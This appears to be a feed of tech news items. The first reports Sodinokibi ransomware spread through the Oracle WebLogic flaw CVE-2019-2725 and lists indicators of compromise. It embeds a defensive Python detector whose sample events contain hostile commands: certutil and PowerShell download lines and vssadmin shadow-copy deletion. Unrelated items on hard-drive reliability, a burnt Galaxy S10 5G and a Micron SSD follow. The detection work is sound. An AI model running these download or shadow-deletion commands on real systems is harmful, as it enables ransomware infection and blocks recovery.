Hackers Exploiting Oracle WebLogic zero-day With New Ransomware To Encrypt User Data

Hackers are exploiting the recently disclosed Oracle WebLogic Server remote code execution vulnerability to install a new variant of ransomware called "Sodinokibi."

The vulnerability allows anyone with HTTP access to the server to carry out the attack without authentication. It affects Oracle WebLogic Server versions 10.3.6.0 and 12.1.3.0; Oracle fixed the issue on April 26 and assigned it CVE-2019-2725.

According to the Talos investigation, the initial stages of the attack were performed on April 25, the same day Oracle released the patch. On April 26 the attackers established connections with different vulnerable HTTP servers.

The attackers leverage the vulnerability to download a copy of the ransomware from attacker-controlled servers; they also infected some legitimate sources and repurposed them for distribution.

“Cisco IR Services and Talos observed the attack requests originating from 130.61.54[.]136 and the attackers were ultimately successful at encrypting a number of customer systems.”

The infection starts with an HTTP POST request that contains a PowerShell or certutil command to download the malicious files and execute them.


Once the infection is triggered, it executes the vssadmin.exe utility, which adds shadow storage that allows Windows to create a manual or automatic backup. The ransomware tries to delete this backup mechanism to stop the data recovery process.
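A defender's view of that chain, as an added example that is not from the article or from Talos: a small Python detector that runs over constructed process-creation events and flags the WebLogic Java process spawning certutil or PowerShell to fetch a file, plus vssadmin tampering with shadow copies. The command lines, file names and the RFC 5737 address 198.51.100.10 are constructed for illustration, not indicators from the page.

```python
import re

# Constructed process-creation events (parent image, child image, command line)
# mirroring the chain in the article: WebLogic's Java process spawning a downloader,
# then the dropped binary running vssadmin. 198.51.100.10 is a documentation address.
SAMPLE_EVENTS = [
    ("java.exe", "certutil.exe",
     "certutil.exe -urlcache -split -f http://198.51.100.10/untitled.exe C:\\Windows\\Temp\\u.exe"),
    ("java.exe", "powershell.exe",
     "powershell.exe -nop -w hidden -c (New-Object Net.WebClient).DownloadFile('http://198.51.100.10/office.exe','C:\\Windows\\Temp\\office.exe')"),
    ("u.exe", "vssadmin.exe", "vssadmin.exe delete shadows /all /quiet"),
    ("u.exe", "vssadmin.exe", "vssadmin.exe resize shadowstorage /for=C: /on=C: /maxsize=401MB"),
    ("explorer.exe", "certutil.exe", "certutil.exe -verify C:\\certs\\server.cer"),  # benign
    ("services.exe", "vssadmin.exe", "vssadmin.exe list shadows"),                   # benign
]

# Each rule: (name, parent regex, child regex, command-line regex); None means "don't care".
RULES = [
    # A WebLogic server process has no business launching a shell or a download LOLBin.
    ("weblogic_spawns_downloader", r"^java\.exe$", r"^(cmd|powershell|certutil)\.exe$", None),
    ("certutil_url_download", None, r"^certutil\.exe$", r"-urlcache\b.*https?://"),
    ("powershell_web_download", None, r"^powershell\.exe$",
     r"DownloadFile|DownloadString|Invoke-WebRequest|Net\.WebClient"),
    ("shadow_copy_tampering", None, r"^vssadmin\.exe$",
     r"\b(delete\s+shadows|resize\s+shadowstorage)\b"),
]

def classify_event(parent, child, cmdline):
    """Return the names of every rule the event matches (empty list means nothing flagged)."""
    hits = []
    for name, parent_re, child_re, cmd_re in RULES:
        checks = ((parent_re, parent), (child_re, child), (cmd_re, cmdline))
        if all(rx is None or re.search(rx, value, re.IGNORECASE) for rx, value in checks):
            hits.append(name)
    return hits

def scan_events(events):
    """Map each flagged command line to its rule hits; benign events are omitted."""
    findings = {}
    for parent, child, cmdline in events:
        hits = classify_event(parent, child, cmdline)
        if hits:
            findings[cmdline] = hits
    return findings

if __name__ == "__main__":
    for cmd, hits in scan_events(SAMPLE_EVENTS).items():
        print(", ".join(hits), "<-", cmd)
```

The parent/child rule is the one that matters most here: even if the downloader command line is obfuscated, a Java application server spawning certutil, PowerShell or cmd is anomalous on its own.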

The ransom note directs victims to a .onion website and to a public domain (decryptor[.]top) that was registered on March 31.


The website asks victims to buy decryptor software to decrypt their files. To buy it, victims must create a Bitcoin wallet and purchase Bitcoin worth $2,500. The bitcoins then need to be transferred to the attackers' wallet address before the decryptor software can be downloaded. The site also offers an option to test the decryptor tool by uploading an encrypted image.

After the Sodinokibi ransomware deployment, the attackers chose to distribute GandCrab v5.2 again to the same victim, thinking their earlier attempts had been unsuccessful.

It is recommended to patch the CVE-2019-2725 vulnerability; the security alert published by Oracle and the patch availability information can be found here.

Indicators of Compromise

Ransomware samples: 

Distribution URLs:
hxxp://188.166.74[.]218/office.exe
hxxp://188.166.74[.]218/radm.exe
hxxp://188.166.74[.]218/untitled.exe
hxxp://45.55.211[.]79/.cache/untitled.exe

Attacker IP:
130.61.54[.]136

Attacker Domain:
decryptor[.]top

How reliable are modern hard drives?

If you want to know how reliable modern hard drives are, ask a company that uses a lot of them.

All hard drive manufacturers provide reliability data for their offerings, but if you want to really know how well they stand up to use, ask a company that uses a lot of them.

Cloud storage specialist Backblaze is a good example.

The good news is that Backblaze publishes quarterly stats and reliability data for the drives it uses, and this data gives us a glimpse into real-world storage reliability.

The data for Q1 2019 contains some interesting tidbits. For example, the cloud backup company has 106,238 hard drives in three data centers. 1,913 of those are boot drives, while the rest are used for storage.

With that many drives in use, trends start to stand out. For example, over the past three years the annualized failure rates for Seagate and HGST have improved, with Seagate's failure rate down 50 percent in that period.

[Figure: Quarterly failure rates for Seagate and HGST hard drives. Source: Backblaze]

But it’s also interesting to note that Seagate failure rates have started to steadily increase over the past three quarters. Backblaze doesn’t yet have an explanation for this.

As for future data, Backblaze is looking to roll out at least twenty 20TB drives for testing by the end of 2019, along with at least one HAMR-based drive from Seagate and/or one MAMR drive from Western Digital.


Galaxy S10 5G bursts into flames, but Samsung refuses to take responsibility

One month after launching the Galaxy Note 7 in August 2016, Samsung was forced to suspend sales of the flagship phone when a manufacturing defect was discovered in its batteries that caused them to generate excessive heat and occasionally light on fire. After more problems were reported with the first batch of replacements, Samsung issued a second recall, and ceased production of the Galaxy Note 7 altogether, once and for all.

The catastrophic episode resulted in the company implementing a new eight-step testing and inspection process for its batteries in all future devices, and in the years since, there haven’t been any widespread issues of note. But even isolated incidents are enough to set off alarm bells following the Note 7 debacle.

This week, a South Korean Galaxy S10 5G owner posted photos of the phone scorched beyond recognition. He says that he hadn't done anything that would cause the S10 5G to combust, claiming it burnt "without [reason]."

“My phone was on the table when it started smelling burnt and smoke soon engulfed the phone,” the S10 5G owner, who asked to be identified by his last name, Lee, told AFP. “I had to drop it to the ground when I touched it because it was so hot.” He then added that “everything inside [the phone] was burnt.”

Samsung, unsurprisingly, refused to refund Lee for his ruined phone. The South Korean company told AFP that the damage to the phone was the result of an “external impact,” not an internal issue. Details surrounding the incident are rather scant from both Samsung and Lee, so until more comes of this, it’s hard to say whether or not the Galaxy S10 5G is actually problematic. That said, this is the first such burnt S10 5G we’ve heard of.


Micron’s new 15TB SSD is almost affordable

Ever so slightly closes the price gap between high-capacity SSDs and HDDs

The 15.36TB drive, which is a smidgen smaller in capacity than the largest hard disk drive currently on the market (a 16TB Toshiba HDD model), costs “only” €2.474,78 plus sales tax or around $2,770 (about £2,140). 

While that is far more expensive than smaller capacity SSDs (Silicon Power’s 1TB SSD retails for under $95 at Amazon), it is less than half the average price of competing enterprise SSDs like the Seagate Nytro 3330, the Western Digital Ultrastar DC SS530, the Toshiba PM5-R or the Samsung SSD PM1633a. 

HDD still wins the price/capacity comparison

And just for the comparison, a 14TB hard disk drive, the MG07 from Toshiba, retails for around $440, about a sixth of the price, which gives you an idea of the price gulf between the two. If you are looking for something bigger, then the Samsung SSD PM1643 is probably your only bet at €7294.22 excluding VAT.

Bear in mind that these are 2.5-inch models which are far smaller than 3.5-inch hard disk drives. They also connect to the host computer using a special connector called SAS (Serial Attached Small Computer System Interface). The Micron 9300 Pro connects via the U.2 PCIe (NVMe), offering read speeds of up to 3.5GBps.

For the ultimate data hoarder, there’s the Nimbusdata Exadrive which boasts a capacity of 100TB albeit in a 3.5-inch form factor.
